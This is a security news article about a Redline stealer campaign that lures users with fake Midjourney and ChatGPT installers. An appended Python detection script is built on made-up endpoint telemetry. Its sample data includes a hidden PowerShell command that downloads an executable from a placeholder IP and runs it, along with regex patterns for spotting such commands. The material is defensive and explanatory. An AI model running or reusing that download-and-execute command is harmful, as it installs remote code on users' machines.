AI-empowered Redline Stealer poses a threat to cybersecurity

May 25, 2023

A recent malvertising campaign has abused Google Search advertising to distribute the Redline stealer, using popular AI tools such as Midjourney and ChatGPT as lures. Consumer-facing AI tools have surged in popularity this year, and that popularity has attracted cybercriminals who ride the trend to infect large numbers of users with their malicious kits.

Researchers revealed an ongoing malicious ad campaign that promotes a fake Midjourney installer. Midjourney is an AI tool that generates images from instructions a user provides in natural language.

The campaign uses SEO-poisoned search results for the relevant keyword that redirect unsuspecting users to attacker-controlled websites, which then serve the Redline Stealer download.

When a user clicks one of the ads, the malicious website sends the visitor's IP address to a backend server. If the IP address belongs to a web crawler, or the visitor reached the page by typing the link manually rather than through the ad, a harmless version of the site is served instead, so that security scanners and analysts never see the payload.

If the user arrives through the malicious ad, however, the site offers a malicious executable posing as a desktop version of Midjourney. Researchers noted that the legitimate Midjourney tool is available only as a web service, so any "desktop installer" is a red flag.

Once the user runs the bait installer, the Redline Stealer begins its malicious activity.

When the malicious installer that bundles the Redline Stealer is launched, it runs a PowerShell script in the background while displaying a fake installation window so as not to raise suspicion.

The script then downloads the Redline Stealer from a remote server and executes it on the infected device. The infostealer harvests and exfiltrates sensitive data such as browser cookies, saved credentials, file details, and cryptocurrency wallet information.

Recent investigations also revealed that the campaign uses the Telegram API for its command-and-control communication, since traffic to a widely used legitimate service is less likely to be blocked by security controls. In addition, other malware delivered through the same campaign uses fake ChatGPT and DALL-E pages as lures.
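The two behaviours described above (an installer spawning a hidden PowerShell download-and-run step, and a freshly dropped executable talking to the Telegram API) are both visible in ordinary endpoint telemetry. The following is an added detection sketch, not code from the original article or from any vendor; it runs over constructed, simplified process-creation and network-connection records loosely modelled on Sysmon events. All host names, process names, PIDs and the TEST-NET address are made up for the example.

```python
"""Detection sketch for the Redline infection chain described above.

Constructed endpoint telemetry (process creation + network connection
records, loosely modelled on Sysmon events) is scanned for:

  1. a hidden PowerShell download cradle spawned by an installer-like process,
  2. a process other than a browser connecting to the Telegram Bot API,
     reported together with its parent-process chain.

Every record below is made up; 203.0.113.10 is a documentation address.
"""
import re
from typing import Dict, List

# --- constructed sample telemetry ------------------------------------------
SAMPLE_EVENTS: List[Dict] = [
    {"type": "process", "pid": 4100, "ppid": 3988,
     "image": r"C:\Users\alice\Downloads\Midjourney-Setup.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "Midjourney-Setup.exe"},
    {"type": "process", "pid": 4120, "ppid": 4100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Users\alice\Downloads\Midjourney-Setup.exe",
     "cmdline": "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass "
                "-Command \"Invoke-WebRequest -Uri http://203.0.113.10/r.exe "
                "-OutFile $env:TEMP\\r.exe; Start-Process $env:TEMP\\r.exe\""},
    {"type": "process", "pid": 4130, "ppid": 4120,
     "image": r"C:\Users\alice\AppData\Local\Temp\r.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "r.exe"},
    # A scheduled maintenance script: legitimate, must NOT trigger the cradle rule.
    {"type": "process", "pid": 5000, "ppid": 900,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\services.exe",
     "cmdline": "powershell.exe -File C:\\ops\\cleanup.ps1"},
    {"type": "network", "pid": 4130,
     "image": r"C:\Users\alice\AppData\Local\Temp\r.exe",
     "dest_host": "api.telegram.org", "dest_port": 443},
    # A browser reaching Telegram Web is normal and must NOT be flagged.
    {"type": "network", "pid": 2200,
     "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dest_host": "api.telegram.org", "dest_port": 443},
]

# All three fragments together make up a "download cradle": hidden window,
# a fetch primitive, and a launch primitive.
CRADLE_PATTERNS = [
    re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    re.compile(r"(Invoke-WebRequest|iwr|DownloadFile|DownloadString|Net\.WebClient)", re.I),
    re.compile(r"(Start-Process|iex|Invoke-Expression|Invoke-Item)", re.I),
]
# Lure themes seen in this campaign, used only to raise severity.
INSTALLER_HINTS = re.compile(r"(setup|install|midjourney|chatgpt|dall-?e)", re.I)
BROWSERS = {"chrome.exe", "firefox.exe", "msedge.exe", "brave.exe", "opera.exe"}
TELEGRAM_HOSTS = {"api.telegram.org"}


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_download_cradle(event: Dict) -> bool:
    """Hidden PowerShell that both fetches and launches something."""
    if event["type"] != "process" or basename(event["image"]) != "powershell.exe":
        return False
    return all(p.search(event["cmdline"]) for p in CRADLE_PATTERNS)


def spawned_by_installer(event: Dict) -> bool:
    return bool(INSTALLER_HINTS.search(basename(event["parent_image"])))


def is_suspicious_telegram_c2(event: Dict) -> bool:
    """Any non-browser process talking to the Telegram Bot API."""
    return (event["type"] == "network"
            and event["dest_host"].lower() in TELEGRAM_HOSTS
            and basename(event["image"]) not in BROWSERS)


def ancestry(pid: int, events: List[Dict]) -> List[str]:
    """Walk parent pointers upward; stops at unknown PIDs or cycles."""
    by_pid = {e["pid"]: e for e in events if e["type"] == "process"}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def scan(events: List[Dict]) -> List[Dict]:
    """Return one finding per matching event, in input order."""
    findings = []
    for e in events:
        if is_download_cradle(e):
            findings.append({"rule": "powershell-download-cradle", "pid": e["pid"],
                             "severity": "high" if spawned_by_installer(e) else "medium"})
        if is_suspicious_telegram_c2(e):
            findings.append({"rule": "telegram-api-from-non-browser", "pid": e["pid"],
                             "severity": "high", "chain": ancestry(e["pid"], events)})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

On the sample data the scan yields two findings: the cradle spawned by `Midjourney-Setup.exe` (high severity because of the installer-style parent) and the dropped `r.exe` contacting `api.telegram.org`, with the parent chain `r.exe -> powershell.exe -> midjourney-setup.exe` attached so an analyst can see the whole infection path at a glance. The scheduled PowerShell job and the browser's Telegram traffic are left alone, which is the point of requiring all three cradle fragments and excluding known browsers rather than alerting on PowerShell or Telegram alone.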

Threat actors are exploiting the current enthusiasm for AI-based tools because these applications draw large numbers of users. Experts stress that knowing how to tell legitimate applications from impostors is essential.

Users should verify the legitimacy of a download source before installing an application, since a fake installer may carry malware.
